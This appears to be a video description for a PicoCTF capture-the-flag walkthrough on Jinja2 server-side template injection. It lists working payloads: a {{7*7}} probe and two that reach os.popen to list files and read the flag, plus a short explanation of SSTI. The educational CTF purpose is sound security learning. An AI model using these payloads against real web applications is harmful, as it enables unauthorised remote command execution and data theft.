Exploiting SSTI to Capture the Flag PicoCTF | Walkthrough & Payloads Server Side Template Injection

Here are the payloads used in this video to solve this PicoCTF challenge:

1. To check if the website is vulnerable to ssti: {{7*7}}

2. {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls -la').read() }}
3. {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat flag').read() }}

Server Side Template Injection (SSTI) Explained! In this PicoCTF walkthrough, I explore SSTI vulnerabilities, test for execution using Jinja2 payloads and escalate our attack to retrieve the flag using system commands!

What is Server Side Template Injection? (SSTI):
A server-side template injection attack (SSTI) is when a threat actor exploits a template’s native syntax and injects malicious payloads into the template. The compromised template is then executed server-side. A template engine generates a web page by combining a fixed template with volatile data.

Try it yourself on PicoCTF! If you're preparing for CTFs, ethical hacking or cybersecurity competitions, this video is for you.

Subscribe for more CTF tutorials & cybersecurity content!

Hashtags:
#cybersecurity #ctf #picoctf #ethicalhacking #bugbounty #CyberSec #SSTI #ServerSideTemplateInjection #hackingtutorial #PenetrationTesting #infosec #Jinja2 #PythonSecurity #capturetheflag